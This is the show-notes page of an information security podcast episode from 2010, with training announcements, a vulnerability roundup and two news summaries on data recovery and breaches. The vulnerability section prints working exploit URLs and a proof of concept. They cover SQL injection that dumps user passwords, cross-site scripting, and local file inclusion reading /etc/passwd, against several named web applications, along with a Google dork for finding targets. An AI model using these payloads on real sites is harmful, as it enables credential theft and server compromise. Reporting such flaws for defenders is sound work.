ISD Podcast Episode 99 for March 31, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- Washington DC – April 12th to 16th
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Cost is $3500 for all classes to reserve and register, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com
SANS Community Atlanta:
- SANS MGMT 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS SEC 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Notacon 7
- April 15th – 18th, 2010 Cleveland, Ohio
- http://notacon.org/
- Adrian will be there presenting on Anti-Forensics
Atlanta ISSA:
http://www.secureworldexpo.com/events/index.php?id=281
Friends of the Podcast:
Webhosting services:WebSpeedway
Vulnerabilities of Interest:
-
- WordPress My Category Order Plugin (mycategoryorder.php) is subject to a SQL Injection vulnerability because it fails to properly sansitize user supplied input in a SQL query. Versions less than 2.8 are affected. Exploit URL is available: http://www.sample.com/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0′&idString=3,5,4,1
- AfterLogic WebMail Pro is subject to a Cross-Site Scripting vulnerability, allowing injection of malicious code in the context of the application. Versions less than 4.7.10 are affected. The targeted user must be logged in the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8.
<html>
<head>
</head>
<body >
<form method=”post”
action=”http://WEBSITE/history-storage.aspx?param=0.21188772204998574″
onSubmit=”return false;”>
<input value=”value”/>
<input name=”HistoryStorageObjectName” value=”location;
alert(‘xss’); //”/>
</form>
</body>
</html>
The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11 - DreamPoll is subject to a Cross-Site Scripting and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application. Versions less than 4.7.10 are affected. Example URLs are available: http://www.sample.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20
http://www.sample.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20
- Docebo is subject to a Multiple SQL Injection vulnerabilities Versions 3.6.0.3 is affected. Google Dork: Powered by PHP Live! v3.2.1, Powered by PHP Live! v3.2.2 and allinurl:”request.php” “deptid”. Example URLs are available: http://www.sample.com/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
http://www.sample.com/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=
http://www.sample.com/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
- Pepsi CMS (Irmin cms) is subject to multiple Local File Inclusion (LFI) vulnerabilities. Version pepsi-0.6-BETA2 is affected. Example URLs are available: http://www.sample.com/PATH/index.php?w=[LFI%]
http://www.sample.com/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00
- Joomla Component com_guide is subject to a SQL Injection vulnerability. Example URLs are available: http://www.sample.com/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12–
- Peazip is subject to a division by zero attack resulting in denial of service vulnerability. Version 3.0 is affected, though others maybe as well. To trigger the vulnerability open up the application, click tools, enter password / keyfile.
Stories of Interest:
News item 1:http://fcw.com/articles/2010/03/24/fose-cloud-computing-not-always-helpful-in-data-recovery.aspx
Newer technologies such as cloud computing can be a boon for post-disaster recovery of data, but they don’t always help much, Dennis Heretick, former chief information security officer for the Justice Department, said at a FOSE trade show session today.
“Cloud computing can provide more reliability, but that should not be assumed,” Heretick said. How a specific cloud application fits within an agency’s or company’s disaster recovery strategy should be assessed by each organization individually, he added.
Overall, in the last five years, disaster recovery and business continuity planning have become easier and less costly because of the availability of automated electronic storage processes for critical data, Heretick said.
Even so, there are hurdles to overcome in developing and implementing a disaster recovery plan and process. Some of the main obstacles include the difficulty of obtaining management support for disaster recovery goals and identifying and obtaining support for roles for individuals to perform in executing the plan, Heretick said.
News item 2:http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=224200279
Seventy-seven percent of C-level executives in a 115-person survey conducted in the U.K. say their organization has experienced a data breach at some point and all of them report attacks targeting corporate data in the past 12 months.
These findings come from a study released on Wednesday by IBM, a company that sells data protection services, and The Ponemon Institute, a privacy and information management research organization.
Larry Ponemon, founder of the group that bears his name, said that survey shows a shift in the way C-level executives think about security software. Investing in data protection, he said, is now seen as less expensive than recovering from a data breach.
Data protection initiatives on average, according to the survey, result in a cost savings or revenue improvement of 11 million ($16 million) for organizations.